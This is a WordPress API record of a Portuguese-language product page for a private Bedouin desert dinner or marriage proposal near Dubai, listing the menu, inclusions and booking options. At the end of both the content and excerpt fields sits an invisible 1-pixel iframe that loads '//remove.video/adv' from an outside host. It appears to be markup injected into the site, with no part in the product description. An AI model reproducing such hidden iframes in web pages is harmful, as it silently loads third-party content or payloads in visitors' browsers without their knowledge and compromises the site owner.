{"id":2035942,"date":"2019-12-26T14:35:00","date_gmt":"2019-12-26T13:35:00","guid":{"rendered":"http:\/\/13.36.131.153\/?post_type=product&#038;p=2035942"},"modified":"2025-01-27T03:34:53","modified_gmt":"2025-01-27T02:34:53","slug":"jantarprivadobeduino","status":"publish","type":"product","link":"https:\/\/soldodubai.com\/pt\/p\/jantarprivadobeduino\/","title":{"rendered":"JANTAR PRIVADO BEDU\u00cdNO OU PEDIDO DE CASAMENTO NO DESERTO, DUBAI"},"content":{"rendered":"<div>\n<p>Este jantar tem lugar num cen\u00e1rio majestoso no deserto, entre areia vermelha e montanhas rochosas, o cen\u00e1rio perfeito para um jantar privado com o aroma do Oriente. O seu motorista ir\u00e1 encontr\u00e1-lo ao p\u00e9 do seu hotel\/resid\u00eancia \u00e0 tarde para o levar ao ponto de partida, a 1 hora de carro.<\/p>\n<p>Este acampamento bedu\u00edno \u00fanico, montado especialmente para si nas profundezas das dunas, permitir-lhe-\u00e1 desfrutar de um momento de relaxamento e de descoberta. Acolhido por um caf\u00e9 tradicional dos Emirados, ser-lhe-\u00e1 servido um jantar delicioso. Este inclui saladas e carne\/galinha grelhada, bem como bebidas e aperitivos. Um momento especial para desfrutar com amigos e familiares, ou com a sua cara-metade para uma experi\u00eancia mais rom\u00e2ntica.<\/p>\n<\/div>\n<div>\n<p>Esta noite dar-lhe-\u00e1 a oportunidade de desfrutar ou experimentar a chicha e o surf de areia, inclu\u00eddos no pacote. A hora de regresso fica ao vosso crit\u00e9rio no dia.<\/p>\n<\/div>\n<div>\n<p>Uma excurs\u00e3o perfeita para celebrar um acontecimento: pedido de casamento, renova\u00e7\u00e3o de votos de casamento, conv\u00edvio de amigos, anivers\u00e1rio e muito mais. Para estas ocasi\u00f5es, pode ser preparado um programa \u00e0 medida. Pode fazer o seu pedido atrav\u00e9s do nosso formul\u00e1rio de reserva.<\/p>\n<\/div>\n<div>\n<p>Este jantar pode ainda ser complementado com v\u00e1rias op\u00e7\u00f5es como um passeio de buggy ou um safari em 4\u00d74 - ver mais no formul\u00e1rio de reserva.<\/p>\n<\/div>\n<div>\n<p><strong>Composi\u00e7\u00e3o do jantar :<\/strong><br \/>\n2 saladas libanesas, Fattoush e Tabbouleh<br \/>\nCreme de h\u00famus e creme de beringela com p\u00e3o pita<br \/>\nFalafel com molho tahini<br \/>\nCarne de vaca, frango e borrego grelhados (ou peixe, se escolher esta op\u00e7\u00e3o)<br \/>\nArroz com especiarias<br \/>\nFruta<br \/>\n\u00c1gua, refrigerantes, ch\u00e1<\/p>\n<\/div>\n<div>\n<p><strong>O que inclui a tarifa :<\/strong><br \/>\nTransfer de e para o seu hotel<br \/>\nO seu jantar privado no acampamento bedu\u00edno, com bebidas inclu\u00eddas<br \/>\nSandboard<br \/>\nChicha<br \/>\nEmpregado de mesa<\/p>\n<p><strong>Localiza\u00e7\u00e3o da empresa:<\/strong> Deserto de Mileiha<\/p>\n<\/div>\n<div>\n<p>&nbsp;<\/p>\n<\/div>\n<p>&nbsp;<\/p>\n<div id=\"ypm-extension\" class=\"ypm-extension\"><\/div>\n<div id=\"ypm-extension\" class=\"ypm-extension\"><\/div>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<div><iframe id=\"embedVideo\" style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/adv\"><\/iframe><\/div>","protected":false},"featured_media":2035946,"template":"","meta":[],"product_brand":[],"product_cat":[140,437,536,553],"product_tag":[],"class_list":{"0":"post-2035942","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-activites","7":"product_cat-activites-dans-le-desert-activites","8":"product_cat-activites-dans-le-desert","9":"product_cat-activite-couple","11":"first","12":"instock","13":"virtual","14":"purchasable","15":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product\/2035942","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/types\/product"}],"version-history":[{"count":0,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product\/2035942\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/media\/2035946"}],"wp:attachment":[{"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/media?parent=2035942"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_brand?post=2035942"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_cat?post=2035942"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/soldodubai.com\/pt\/wp-json\/wp\/v2\/product_tag?post=2035942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}